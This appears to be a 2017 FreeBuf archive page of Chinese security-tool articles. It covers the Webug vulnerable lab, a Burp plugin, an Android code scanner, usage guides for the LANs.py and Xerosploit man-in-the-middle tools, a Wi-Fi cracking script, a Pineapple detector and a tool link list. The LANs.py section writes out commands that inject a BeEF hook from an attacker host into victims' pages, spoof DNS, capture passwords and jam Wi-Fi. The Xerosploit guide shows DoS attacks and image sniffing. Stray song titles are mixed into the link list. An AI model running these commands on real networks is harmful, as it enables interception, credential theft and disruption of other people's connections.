月度归档:2017年09月

国产漏洞靶场Webug 3.0发布

webug名称定义为“我们的漏洞”靶场环境,基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于windows操作系统的漏洞所以将webug的web环境都装在了一个纯净版的windows 2003的虚拟机中。

国产漏洞靶场Webug 3.0发布

webug漏洞靶场中包含的漏洞环境:

get注入

图片破解

信息收集练习——目录端口收集

暴力破解练习

x-forwarded-for注入

支付漏洞

垂直越权

CSRF

url跳转

GET任意文件下载

POST任意文件下载

无验证上传

反射型XSS

存储型XSS

校验扩展名上传

验证来源去向的url跳转

文件包含

POST文件包含

HOST注入

APK破解

延时注入

DZ7.2论坛sql注入

aspcms注入

phpmyadmin任意文件包含漏洞

齐博系统SQL注入

海盗云商getshell

PHP168任意代码执行GET SHELL

ecshop 注入

ShopXp系统SQL注射漏洞

Dcore(轻型CMS系统)注入漏洞

MetInfo 任意文件包含漏洞可getshell

Metinfo news.php盲注

Metinfo img.php盲注

万众电子期刊在线阅读系统PHP和ASP最新版本通杀SQL注入

BEESCMS sql注入,无视防御

ourphp 注入

phpwind 命令执行漏洞

metinfo  任意用户密码修改

DZ 3.2 存储型XSS

DedeCMS flink.php友情链接注入

DedeCms?recommend.php注入

BEESCMS 小于等于V4四处注入+无需密码直接进后台

海洋 x-forwarded-for注入

php截断利用

st2-016

jboss命令执行

tomcat弱口令

hfs远程命令执行

st2-052命令执行

flash远程命令执行

gh0st远程溢出

IIS6.0远程溢出 

虚拟机纯净版系统,无任何补丁(也就是意味着附带所有windows 2003的漏洞包括 ms08-067、ms17-010、ms15-015等所有漏洞)

免责:

webug由于漏洞过多,非常不建议提取出来后搭建在真实环境中。

下载地址:

https://pan.baidu.com/s/1eRIB3Se

准备长期更新,弄了个官网:http://www.webug.org

*本文作者:小小艾_Joker,转载请注明来自 FreeBuf.COM

Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍

本文我将介绍一个新的 Burp Suite插件Handy Collaborator。Burp Suite Collaborator是添加到Burp Suite的外部服务器,主要用于挖掘那些仅来自外部服务交互的out-of-band(带外)漏洞和问题。这是一个非常实用的工具,并添加了Burp Suite Scanner的强大功能。Burp Suite Collaborator的实用性,不仅体现在自动化测试当中,在手动测试方面也表现出色。

Collaborator的用例范围举例:

1. 你不能在关键Web应用程序上使用自动化扫描器进行测试

2. 你想要重现Active Scanner发现的Collaborator问题

3. 你想要测试一个使用Base64编码的有效负载的外部服务交互的问题。而Burp Suite自动扫描器并不会帮你发现该类问题(因为它没有正确编码payload),但通过手动测试和Collaborator就能使你轻松的发现该类问题!

4. 你只需要一个外部服务器进行手动测试!

5. 等等!

Burp Suite提供了一个客户端手动使用Collaborator,但它的问题也显而易见极大的降低了手工测试的效率,因为用户需要频繁切换选项卡,为每次测试手动生成一个新的payload并且手动执行轮询(Polling)。而有了Handy Collaborator这一切的操作都将在后台完成,并且每一次交互都会被添加为一个新的issue!

Collaborator插件的使用也非常简单。下载并加载后,两个新条目将出现在Burp Suite的可编辑选项卡的上下文菜单中:

Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍

通过单击(“Insert collaborator payload”)条目,将Collaborator payload插入到选中的点((如果你点击某个点,或室选择了request某个部分,它们可以同时工作):

Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍

通过单击第二个条目(““Insert collaborator insertion point”),将在请求中插入一个自定义插入点(Intruder like)。每次执行请求时,插入点将自动替换为新生成的Collaborator payload。你还可以添加多个自定义插入点,并在每个点插入不同的Collaborator payload:

Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍

这个插件启动一个线程,它每3秒会对Collaborator服务器进行轮询。如果发现了交互,则被报告为一个Burp Suite issue:

Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍

目前,由于Burp Suite API的限制,在卸载扩展或关闭Burp Suite之后,将无法检索此扩展生成的payload相关的Collaborator交互的细节。原因在于Burp Suite 不可能保存Collaborator的上下文。但我相信这个功能会在不久的将来被添加。

你可以在Github下载到目前的最新版本:https://github.com/federicodotta/HandyCollaborator/releases

*参考来源:mediaservice,FB小编 secist 编译,转载请注明来自FreeBuf.COM

Android Studio源码扫描工具:Code Arbiter

目前Android应用代码漏洞扫描工具主要是在应用打包完成后,对应用进行解包扫描。而专门针对Android Studio中的源码进行漏洞扫描的工具则较少,且覆盖的漏洞种类不全,很难满足安全检测的需求,Android Code Arbiter就是为弥补上述缺陷而产生的。该工具依托FindBugs插件,根据Find Security Bugs为蓝本进行更改,以扩展jar包的形式在FindBugs上运行。

1、概述

该文章主要是针对工具的使用进行详细的说明,关于工具原理的说明可参见另一篇文章:Android Code Arbiter原理详解,该文章详细叙述了工具的扫描原理。

工具源码地址,打包好的jar包地址:Android-Code-Arbiter-0.8.3.jar,工具的整体架构详见下图。

Android Studio源码扫描工具:Code Arbiter

2、使用指南

2.1 安装FindBugs插件

由于该工具以FindBugs为依托,因此首先需要在Android Studio中安装FindBugs的插件。在Android Studio中找到Preferences/Plugins选项,在该复选框中通过上方搜索,或将FindBugs插件下载到本地(下载地址:FindBugs-IDEA),使用 Install plugin from disk进行安装。建议将插件下载到本地进行安装,通过搜索进行安装的插件可能版本比较陈旧,安装示意图如下所示。安装完成后需要重启Android Studio。

Android Studio源码扫描工具:Code Arbiter

2.2 安装Android Code Arbiter插件

完成FindBugs插件后,将会在Preferences/Other Settings中找到安装插件的选项FindBugs-IDEA,点击中测靠左的 + 号,在弹出的选框中选择 4.Install plugin from disk,在弹出的选框中选择下载的Android Code Arbiter的jar包,点击OK,此时会发现插件已经安装了,但是不要忘记点击右下角的Apply按钮,然后点击OK,并重启Android Studio完成插件安装。安装部分示意图,如下所示。

Android Studio源码扫描工具:Code Arbiter

3、扫描

完成安装后就可以开始扫描了,右键点击待扫描项目,在出现的复选框中找到FindBugs,在弹出的选项中选择Analyze Project Files,此时FindBugs便会自动开始对项目进行扫描了,扫描的步骤如下图所示。

Android Studio源码扫描工具:Code Arbiter

4、扫描结果展示

在Android Studio的下半部分就可以看到分析后的结果,在分析的问题中找到Android安全问题的选项,里面的内容就是插件的分析结果,如下图所示。

Android Studio源码扫描工具:Code Arbiter

5、干扰清除

5.1 清除干扰结果

由于Findbugs本身包含一些代码质量的分析,有时会对查看分析结果造成干扰,此时可以设置检测条目,只保留Android安全问题的展示,设置方法如下:

在Preferences选框中找到FindBugs-IDEA选项,选择其Detector选框,只保留Find Security Bugs检测选项,设置如下图所示,这样检测结果只会出现Android相关安全问题的检测项。

Android Studio源码扫描工具:Code Arbiter

5.2 清除检测结果

检测的结果可能存在误报,让你看起来很不舒服,此时可以手动去除检测结果。

清除单个检测结果

清除单个检测结果只需左击该检测项左侧对于的BUG图案,在弹出的选框中点击clear即可,如下图所示:

Android Studio源码扫描工具:Code Arbiter

清除所有检测结果

清除所有检测结果,只需在下方的分析栏中点击左侧的 X 号即可,如下图所示:

Android Studio源码扫描工具:Code Arbiter

*本文作者:nightmarelee,转载请注明来自 FreeBuf.COM

LANs.py:一款可以实现代码注入,无线渗透和WiFi用户监控的强大工具

LANs.py:一款可以实现代码注入,无线渗透和WiFi用户监控的强大工具

LANs.py功能简介

1.      自动寻找当前网络中最为活跃的WLAN用户,并对其中的一名用户实施监控,然后向该用户所访问的Web页面注入任意HTML或JavaScript代码;

2.      干扰附近的WiFi网络,干扰范围取决于无线网卡的性能。我们可以通过修改配置来实现干扰所有人的WiFi信号或仅干扰某一特定用户的WiFi信号。但是LANs.py不支持对用户同时进行WiFi干扰和监听。

依赖组件

Linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(如果你不知道目标用户的IP地址,那么你还需要一块支持混杂模式的无线网卡)

测试环境为Kali Linux,发动攻击的设备地址为192.168.0.5,目标设备的IP地址为192.168.0.10。

所有的可选操作项:

Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP]
                [-rmac ROUTERMAC] [-pcap PCAP][-s SKIP] [-ch CHANNEL]
                [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS]
                [--directedonly] [--accesspointACCESSPOINT]

工具使用

目前该工具支持从以下协议收集数据:HTTP、FTP、IMAP、POP3和IRC。LANs.py将会打印出URL地址所返回的资源中前135个字符,并自动忽略结尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它还能够输出任意协议下传输的用户名/密码、以及接收或发送的电子邮件和IRC消息。

LANs.py:一款可以实现代码注入,无线渗透和WiFi用户监控的强大工具

常用命令:

python LANs.py -u -p

其他常用命令:

python LANs.py -u -p -d -ip 192.168.0.10

-d:查看所有的图片

-ip:设置目标IP地址

HTML注入:

python LANs.py -bhttp://192.168.0.5:3000/hook.js

向目标用户所访问的页面中注入一个BeEF钩子(http://beefproject.com/,【参考教程】),注入的参数会包裹在<script>标签中,所以你可以在一个JavaScript文件中的任意位置输入内容。

python LANs.py -c'<title>Owned.</title>'

向目标用户所访问的页面中注入任意HTML代码。工具首先会尝试在第一个<head>标签之后注入内容,如果失败则尝试在第一个</head>标签之前注入内容。上面给出的示例代码会将页面标题(title)修改为’Owned.’。

读取pcap文件:

python LANs.py -pcap libpcapfilename -ip192.168.0.10

为了成功读取pcap文件中的内容,你需要使用-ip参数指定目标IP。该功能的一个优点就是用户无需使用root权限便可执行该脚本。

DNS欺骗:

python LANs.py -a -r 80.87.128.67

-a选项将会对目标发出的每一次DNS请求进行欺骗攻击,并将用户请求重定向至-r参数所制定的地址。无论用户在地址栏中输入的是什么地址,他们都将会被重定向到stallman.org(80.87.128.67)。

python LANs.py -dns eff.org

该命令将会对域名eff.org及其子域名进行DNS欺骗。

其他使用:

python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js-ip 192.168.0.10

干扰所有的WiFi网络:

python LANs.py --jam

仅干扰指定接入点:

python Lans.py --jam --accesspoint01:MA:C0:AD:DY

所有的可用选项

常规使用:

-b BEEF_HOOK_URL:将BeEF hookURL注入到目标用户所访问的每一个页面中,例如-b http://192.168.1.10:3000/hook.js

-c ‘HTML CODE’:向目标用户访问的页面中注入任意HTML代码。

-d:查看目标用户访问的图片。

-dns DOMAIN:对指定DNS域名进行DNS欺骗攻击,例如-dnsfacebook.com。

-a:对用户的所有DNS请求进行DNS欺骗攻击。

-r IPADDRESS: 仅用于-dnsDOMAIN选项。

-u:打印出目标用户所使用的URL地址。

-i INTERFACE: 指定接口,例如-i wlan0。

-ip:指定目标IP地址。

-n: 对目标执行nmap扫描。

-na:在后台对目标执行更具攻击性的nmap扫描,并将扫描结果输出到[victim IP address].nmap.txt。

-p:打印出FTP/IMAP/POP/IRC/HTTP协议下传输的用户名/密码、以及接收或发送的电子邮件和IRC消息。

-pcap PCAP_FILE: 解析pcap文件中所有的数据包; 需要输入-ip[target’s IP address]参数。

-rmac ROUTER_MAC:指定路由器的MAC地址。

-rip ROUTER_IP:指定路由器的IP地址。

–jam:对2.4GHz无线接入点以及客户端进行干扰攻击。

WiFi干扰:

-sMAC_Address_to_skip:指定需跳过的MAC地址。

-m MAXIMUM: 指定攻击客户端的最大数量。

-t TIME_INTERVAL: 设置攻击间隔。

–packets NUMBER:指定每一次攻击中发送的数据包数量。

–accesspoint ROUTER_MAC:输入目标AP的MAC地址。

* 参考来源:DanMcInerney, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

教你如何和使用这款强大的渗透平台-Xerosploit

教你如何和使用这款强大的渗透平台-Xerosploit

写在前面的话

在这篇教程中,我们将教会大家如何使用Xerosploit。Xerosploit是一款渗透测试工具包,它的主要功能就是执行中间人攻击。它本身自带有多种功能不同的模块,这些模块具有多种功能,除了中间人攻击之外,Xerosploit还可以进行端口过滤以及拒绝服务攻击。

我们可以用这款工具来执行拒绝服务攻击和中间人攻击,Xerosploit自带的功能模块还可以捕捉目标用户的图片数据,我们可以将这些模块用于注入攻击之中。毫无疑问,这是一款使用简单且功能强大的攻击平台。

下载地址

Xerosploit:【GitHub主页

工具依赖组件

nmap
hping3
build-essential
ruby-dev
libpcap-dev
libgmp3-dev
tabulate
terminaltables

工具功能

端口扫描
网络映射
DoS攻击
HTML代码注入
JavaScript代码注入
下载拦截和替换
嗅探攻击
DNS欺骗
图片替换
Drifnet
Web页面篡改

工具安装

首先,使用git命令将Xerosploit项目源码克隆到本地:

$ git clone https://github.com/LionSec/xerosploit.git

接下来,用sudo命令运行安装脚本install.py:

$ sudo python install.py

教你如何和使用这款强大的渗透平台-Xerosploit

教你如何和使用这款强大的渗透平台-Xerosploit

工具使用

安装完成之后,你需要选择你的操作系统,然后输入Xerosploit运行工具。

教你如何和使用这款强大的渗透平台-Xerosploit

输入命令‘help’之后,你可以查看到所有的可用命令。

教你如何和使用这款强大的渗透平台-Xerosploit

首先,你需要使用命令‘scan’对目标网络进行扫描,并映射出该网络内的所有设备。

教你如何和使用这款强大的渗透平台-Xerosploit

然后选择目标IP地址,并输入‘help’命令。

教你如何和使用这款强大的渗透平台-Xerosploit

你可以选择使用任意模块发动攻击,我们先使用端口扫描器pscan来进行操作演示。

教你如何和使用这款强大的渗透平台-Xerosploit

接下来,我们来尝试进行DoS攻击,为了对数据包进行检测,我们需要在发动攻击的系统中配置Wireshark。

接下来,输入命令‘back’返回主菜单,然后进入dos>>run来执行攻击。

教你如何和使用这款强大的渗透平台-Xerosploit

教你如何和使用这款强大的渗透平台-Xerosploit

现在,我们可以尝试对该网络内的其他用户进行嗅探攻击,看看他们正在查看什么图片。

教你如何和使用这款强大的渗透平台-Xerosploit

教你如何和使用这款强大的渗透平台-Xerosploit

攻击开始之后,我们就可以查看到目标用户当前正在查看的图片了。

总结

除了本文所介绍的功能之外,Xerosploit还有非常多的功能等待着大家去发现,喜欢该工具的朋友可以下载下来使用一下,我们也欢迎有编码能力的朋友为该项目贡献自己的一份力量。

免责声明

本文仅出于教育目的,读者使用该工具所进行的任何行为与FB及开发者本人没有任何关系。请大家将其用户合法目的,谢谢大家的支持!

* 参考来源:xerosploit, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

全能无线渗透测试工具,一个LAZY就搞定了

近来一直在研究无线安全方面的东西,特别是在无线渗透测试这块,每次渗透测试时总要来回不停的切换操作和挑选利器,很是麻烦。就想看看是否可以有一款功能全面的集合型工具。

正所谓功夫不负有心人,还真有这么一个工具出现在我的眼前。它便是名为LAZY script应用于Kali Linux下的执行脚本。该脚本可以自动执行有关Wi-Fi穿透和黑客攻击的绝大部分应用程序,同时它还集合了大量不同类型的攻击程序,可谓是集众家之长于一身。这么好的东西,必须和各位小伙伴一起分享。

其实,这样一款好的工具,不仅可以让从事日常安全工作研究变得得心应手,同时对提高无线安全方面的相关学习提供了极大便利。特别是它在使用中可以借助自定义键盘快捷键,只要在lscript中启动任何工具,均可以使用自己此前设定好的快捷方式。

当然LAZY script还能快速变更MAC地址,只要使用它里面的禁用界面功能即可,让自己的匿名操作更加快捷。另外,它还可以意见查看自己的公共IP地址信息、MAC地址信息等操作。在Wi-Fi密码脚本方面支持的也比较全面,如Handshake(WPA-WPA2)、Find WPS PIN(WPA-WPA2)、WEP hacking(WEP)等。

经过上述简单介绍,看官们一定对LAZY script这个工具产生兴趣了吧,下面我们开始详细展示。

首先,我们在命令界面下执行程序下载。

下载克隆链接:git clone https://github.com/arismelachroinos/lscript.git

待程序下载完毕后,开始执行启动安装命令:cd /opt/lscript

当然,在安装过程中我们可能会遇到一个小难题,那就是权限限制,需要进行调整,此时我们就需要用到这条命令:chmod +x install.sh

待权限调整完毕后,正式执行安装:./install.sh

全能无线渗透测试工具,一个LAZY就搞定了

这便是安装前脚本工具下载状态所显示的进度图

全能无线渗透测试工具,一个LAZY就搞定了

执行安装命令展示

全能无线渗透测试工具,一个LAZY就搞定了

系统会在安装开始时给予一段有关权限限制的说明内容,这也是为什么会有权限调整的命令出现。

全能无线渗透测试工具,一个LAZY就搞定了

此时,系统会蹦出一段提示语,主要的意思是询问我们是对程序进行安装(i选项),还是选择升级(u选项),此时我们选择i安装。

全能无线渗透测试工具,一个LAZY就搞定了

系统会再次询问,我们是否继续执行安装,此时选择yes即可。

全能无线渗透测试工具,一个LAZY就搞定了

程序安装完毕后,会提示我们直接打开一个新的终端输入小写“L”命令,便可以直接加载运行程序脚本,键入ks可以对自己所需要的快捷方式进行设置。

全能无线渗透测试工具,一个LAZY就搞定了

启动程序后首先看到的快捷提示界面。

既然程序已经安装完毕,并且可以正常启动,那么我们接下来就进入运行和测试阶段,主要来一起体验下LAZY script的功能及使用情况。查看无线适配器信息,并启动wlan0适配器。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

启动一个新的控制台,并输入“l”运行程序,很快系统反馈给我们接受说明条款的内容。

全能无线渗透测试工具,一个LAZY就搞定了

在我们接受条款过后,系统会奉上程序使用声明内容。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

在声明内容过后,还会给予一段提示说明,并且蹦出判断选项。

提示的内容大概意思为该工具主要用于教育和学习,旨在提高个人专业技能,并且使用环境为当前个人网络环境内可以使用此工具,并且免责说明也很明确,如果使用者违反任何规定,将于该程序开发者无任何关系等,如果同意便选择“Yes”。

既然是第一次使用,多少整个体验过程会显得很繁琐和厌倦。这不脚本程序被正式运行后,还需要进行管理模式和监听模式的制定端口配置,下图中黄色字体表示可用接口。

全能无线渗透测试工具,一个LAZY就搞定了

当你熬过这一步之后,这个程序就算是真正的被启动了,虽说万事开头难,但考虑到它的全面性,前面的烦琐流程我们也就忍了。

全能无线渗透测试工具,一个LAZY就搞定了

程序被启动后的正式界面,在此先让大家一饱眼福,稍后再进行具体说明。

接着,我们来说下,有关这款工具的卸载与升级,当然,这些也都只能在命令状态下处理,而非图形界面中使用。

程序卸载命令:

启动卸载:cd /opt/lscript/

权限调整:chmod +x uninstall.sh 

卸载执行:./uninstall.sh 

删除剩余文件:rmdir -r /opt/lscript

程序更新命令:

直接选择运行界面中的|update) Check for updates即可,简单方便。

既然卸载和程序升级都已经进行了说明,最后就该进入测试阶段了。

既然是一款可以很好隐藏自己并查看公共地址的工具,就先从MAC入手吧。

先测试下修改MAC地址的功能,选择3)Change MAC。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

系统会让我们选择对应网络,此处我们选择第一个。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

如果默认选项r,只需要点击回车即可随机产生一个MAC地址出来,如果想指定一个地址就需要输入s来设定需要的MAC地址了。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

当然,LAZY script既然是一个功能很全面的脚本工具,那么里面必然囊括很多不同类型的功能。这里我们根据自己的需要来选择安装即可。

为了方便测试,我们选择了选项9)TOOLS进行安装。

在工具选择完毕后,我们还能看到很多目前市面主流的渗透测试工具和框架可供我们选择安装,为了方便展示,在此选择Fern Wi-Fi Cracker破解工具进行安装。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

相信作为圈内人,凡是搞过无线渗透的小伙伴对该工具都不会感到陌生,完全图形化的操作界面容易上手,选择11)Fern选项。

很快Fern工具就开始安装,不久后就能开始使用了。

全能无线渗透测试工具,一个LAZY就搞定了

在安装完毕后,我们可以选择1)Wi-Fi tools来查看工具的具体安装情况,以便知道我们目前拥有哪些可用的工具。

全能无线渗透测试工具,一个LAZY就搞定了

图中黄色序号和灰色字体工具名表示我们已经完成安装和部署,呈现可使用状态。反之红色字体的序号和工具名则需要我们重新进行安装和部署。

全能无线渗透测试工具,一个LAZY就搞定了

启动安装好的工具,便可以进入最终的用例测试和学习阶段了,至此,今天我要分享的内容结束啦。

*本文作者:2cat,转载请注明来自FreeBuf.COM

一款能检测当前网络中是否存在WiFi- Pineapple并评估当前WiFi安全性的工具 – PiFinger

今天给大家介绍一款名叫PiFinger的工具,这款工具可以搜索当前网络环境中是否存在WiFi-Pineapple的痕迹,并对无线网络的安全性进行评分。

一款能检测当前网络中是否存在WiFi- Pineapple并评估当前WiFi安全性的工具 &#8211; PiFinger

关于项目

该项目的主要目的是为了判断我们当前所连接到的开放网络是否跟WiFi-Pineapple有关。除此之外,这款工具还可以对你之前所链接过的WiFi网络进行安全性分析,并最终给出网络安全评分。

功能介绍

1.      判断该网络是否由Wifi-Pineapple搭建

2.      判断用户之前是否连接过不安全的网络

3.      对网络安全性进行评分

PiFinger所使用的技术

WiFi-Pineapple网络检测技术

如果攻击者利用了默认配置从而成功访问到了目标系统的话,我们同样可以利用他们软件或硬件中的默认配置发现攻击者的痕迹。

因此,PiFinger使用了如下所示的几项技术来检测WiFi-Pineapple:

1.      制造商的MAC地址信息

2.      默认HTTP端口号为(1471)

3.      WiFi-Pineapple的默认主机名信息

评估之前的网络安全性

1.      分析用户设备之前所连接过的网络安全状态

待添加的功能

1.      开发Windows版本

2.      完整的自动化分析功能

3.      新的WiFi安全评分机制以及Pineapple检测技术

使用方法(Linux平台)

基本要求

1.      基础模块:time、termcolor、sys、commands、interfaces和os

2.      操作系统:Kali Linux或Ubuntu

3.      Python版本:Python 2.x

下载PiFinger:

git clonehttps://github.com/besimaltnok/PiFinger.git

安装Python依赖库:

pip install -r requirements.txt

OK,一切安装完毕!接下来,你可以使用下列命令运行PiFinger:

cd PiFinger/Linux
python pifinger.py

工具运行截图

PiFinger主界面:

一款能检测当前网络中是否存在WiFi- Pineapple并评估当前WiFi安全性的工具 &#8211; PiFinger

PiFinger正在运行:

一款能检测当前网络中是否存在WiFi- Pineapple并评估当前WiFi安全性的工具 &#8211; PiFinger

WiFi安全性评分:

一款能检测当前网络中是否存在WiFi- Pineapple并评估当前WiFi安全性的工具 &#8211; PiFinger

WiFi评分日志:

一款能检测当前网络中是否存在WiFi- Pineapple并评估当前WiFi安全性的工具 &#8211; PiFinger

* 参考来源:PiFinger, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

安全从业人员常用工具指引

简介

一直以来嫌麻烦没注册freebuf,总是以游客的身份在看一些东西,今天特此注册了一下,首先要表扬一下freebuf,安全验证比较给力,其次感谢平台收集并整理众多有用的资料。因此就想将以前的资料收录在平台,希望帮助更多的安全圈人事。 

刚入门的汉子,一直以来或许在收集有用的文章,有用的圈子,不但得不到大牛的回应,更多就是碰壁,别人厉害点吧,懒得理你,人之本性,扶强不扶弱,以后会贡献出大批量好文章,希望给那些进不去圈子,挤不进去的人,一个自我重塑的机会,给圈子贡献一份微薄的力量,文章工具纯是收集,今天偶然发现微信公众号上自己还收集过还有一篇这个样子的文章,特意分享出来出来,格式忽略,看干货就是。

介绍

没有利益纠纷,希望给各位带来一些干货,说是安全圈子,想要完全挤进去太难了,时间永远是最宝贵的,就想翻墙后,你可以看到有很多国内收费的资料,一部分崇洋媚外的人,宁可翻墙免费分享,也要卖关子不给你分享。再次希望圈子里面的大牛小牛,多多分享,翻墙久了,你会发现,那些崇洋媚外,也不是没有道理,就好比现在一些噱头资源,国内你辛辛苦苦搜半天才拿到的资源,下载完,发现加密了,翻墙后,尽然是免费的。那种无助感,可想而知,中国人从来都有窝里斗的嫌疑,希望大家没事儿除了安全多读些书,别成为自己当初讨厌的那种人…… 安利完了,有心的人,已经收藏了,没心的还在逗留…..

入门指南

https://wizardforcel.gitbooks.io/web-hacking-101/content/                  Web Hacking 101 中文版

https://wizardforcel.gitbooks.io/asani/content/                            浅入浅出Android安全 中文版

https://wizardforcel.gitbooks.io/lpad/content/                             Android 渗透测试学习手册 中文版

https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/  Kali Linux Web渗透测试秘籍 中文版

https://github.com/hardenedlinux/linux-exploit-development-tutorial        Linux exploit 开发入门

https://www.gitbook.com/book/t0data/burpsuite/details                      burpsuite实战指南

http://www.kanxue.com/?article-read-1108.htm=&winzoom=1                    渗透测试Node.js应用

https://github.com/qazbnm456/awesome-web-security                          Web安全资料和资源列表

https://sec-wiki.com/                                                      sec-wiki安全维基百科

She Is My Sin Nightwish - Wishmaster

fuzz工具收集

https://github.com/ivanfratric/winafl

https://github.com/attekett/NodeFuzz


https://github.com/google/oss-fuzz


http://blog.topsec.com.cn/ad_lab/alphafuzzer/


http://llvm.org/docs/LibFuzzer.html

子域名枚举

Heavy Linkin Park;Kiiara – One More Light

https://github.com/lijiejie/subDomainsBrute (经典的子域名爆破枚举脚本)

https://github.com/ring04h/wydomain (子域名字典穷举)

https://github.com/le4f/dnsmaper (子域名枚举与地图标记)

https://github.com/0xbug/orangescan (在线子域名信息收集工具)

https://github.com/TheRook/subbrute (根据DNS记录查询子域名)

https://github.com/We5ter/GSDF (基于谷歌SSL透明证书的子域名查询脚本)

https://github.com/mandatoryprogrammer/cloudflare_enum (使用CloudFlare进行子域名枚举的脚本)

https://github.com/18F/domain-scan (A domain scanner)

https://github.com/guelfoweb/knock (Knock Subdomain Scan)

https://github.com/Evi1CLAY/CoolPool/tree/master/Python/DomainSeeker (多方式收集目标子域名信息)

https://github.com/code-scan/BroDomain (兄弟域名查询)

https://github.com/chuhades/dnsbrute (基于dns查询的子域名枚举)

web应用扫描器

http://github.com/Arachni/arachni   (web应用安全扫描器框架 http://www.arachni-scanner.com)

数据库扫描、注入工具

https://github.com/sqlmapproject/sqlmap (注入工具之王sqlmap)

https://github.com/0xbug/SQLiScanner (一款基于SQLMAP和Charles的被动SQL注入漏洞扫描工具)

https://github.com/stamparm/DSSS (99行代码实现的sql注入漏洞扫描器)

https://github.com/youngyangyang04/NoSQLAttack (一款针对mongoDB的攻击工具)

https://github.com/Neohapsis/bbqsql (SQL盲注利用框架)

https://github.com/NetSPI/PowerUpSQL (攻击SQLSERVER的Powershell脚本框架)

https://github.com/WhitewidowScanner/whitewidow (又一款数据库扫描器)

https://github.com/stampery/mongoaudit (MongoDB审计及渗透工具)

https://github.com/commixproject/commix (注入点命令执行利用工具)

弱口令或信息泄漏扫描

Conquest Of Paradise (征服天堂) Vangelis – 1492 – Conquest of Paradise (Soundtrack from the Motion Picture)

https://github.com/lijiejie/htpwdScan (一个简单的HTTP暴力破解、撞库攻击脚本)

https://github.com/lijiejie/BBScan (一个迷你的信息泄漏批量扫描脚本)

https://github.com/lijiejie/GitHack (.git文件夹泄漏利用工具)

https://github.com/LoRexxar/BScanner  (基于字典的目录扫描小工具)

https://github.com/she11c0der/fenghuangscanner_v3  (各种端口及弱口令检测,作者wilson9x1,原地址失效)

https://github.com/ysrc/F-Scrack (对各类服务进行弱口令检测的脚本)

https://github.com/Mebus/cupp (根据用户习惯生成弱口令探测字典脚本)

https://github.com/RicterZ/genpAss (中国特色的弱口令生成器)

https://github.com/netxfly/crack_ssh (go写的协程版的ssh/redis/mongodb弱口令破解工具)

https://github.com/n0tr00t/Sreg (通过输入email、phone、username的返回用户注册的所有互联网护照信息)

https://github.com/repoog/GitPrey (GitHub敏感信息扫描工具)

https://github.com/dxa4481/truffleHog (GitHub敏感信息扫描工具,包括检测commit等)

https://github.com/LandGrey/pydictor (暴力破解字典建立工具)

https://github.com/GDSSecurity/xxe-recursive-download  (xxe漏洞递归下载工具)

https://buer.haus/xxegen/  (xxe在线生成利用工具)

物联网设备扫描

Élan Nightwish – Élan

https://github.com/rapid7/IoTSeeker (物联网设备默认密码扫描检测工具)

https://github.com/shodan-labs/iotdb (使用nmap扫描IoT设备)

https://github.com/jh00nbr/Routerhunter-2.0 (路由器漏洞扫描利用)

https://github.com/reverse-shell/routersploit   (路由器漏洞利用框架)

https://github.com/scu-igroup/telnet-scanner (telnet服务密码撞库)

https://github.com/RUB-NDS/PRET                 (打印机攻击框架)

XSS扫描

https://github.com/shawarkhanethicalhacker/BruteXSS (Cross-Site Scripting Bruteforcer)

https://github.com/1N3/XSSTracer (A small python script to check for Cross-Site Tracing)

https://github.com/0x584A/fuzzXssPHP (PHP版本的反射型xss扫描)

https://github.com/chuhades/xss_scan (批量扫描xss的python脚本)

https://github.com/BlackHole1/autoFindXssAndCsrf (自动化检测页面是否存在XSS和CSRF漏洞的浏览器插件)

企业网络自检

https://github.com/sowish/LNScan (详细的内部网络信息扫描器)

https://github.com/SkyLined/LocalNetworkScanner (javascript实现的本地网络扫描器)

https://github.com/ysrc/xunfeng (网络资产识别引擎,漏洞检测引擎)

https://github.com/laramies/theHarvester (企业被搜索引擎收录敏感资产信息监控脚本:员工邮箱、子域名、Hosts)

https://github.com/x0day/Multisearch-v2  (搜索引擎聚合搜索,可用于发现企业被搜索引擎收录的敏感资产信息)

webshell检测以及病毒分析工具Saw Bitch Workhorse Don Davis – Matrix Revolutions: The Motion Picture Soundtrack (UK Version)

https://github.com/We5ter/Scanners-Box/tree/master/webshell/ (简单的php后门检测工具以及webshell样本库)

https://github.com/ym2011/ScanBackdoor (Webshell扫描工具)

https://github.com/yassineaddi/BackdoorMan (PHP后门扫描)

https://github.com/he1m4n6a/findWebshell (又一款webshell检测工具)

https://github.com/Tencent/HaboMalHunter (哈勃分析系统,linux系统病毒分析及安全检测)

https://github.com/PlagueScanner/PlagueScanner (使用python实现的集成ClamAV、ESET、Bitdefender的反病毒引擎)

https://github.com/nbs-system/php-malware-finder (一款高效率PHP-webshell扫描工具)

https://github.com/emposha/PHP-Shell-Detector/ (测试效率高达99%的webshell检测工具)

内网安全渗透测试工具集

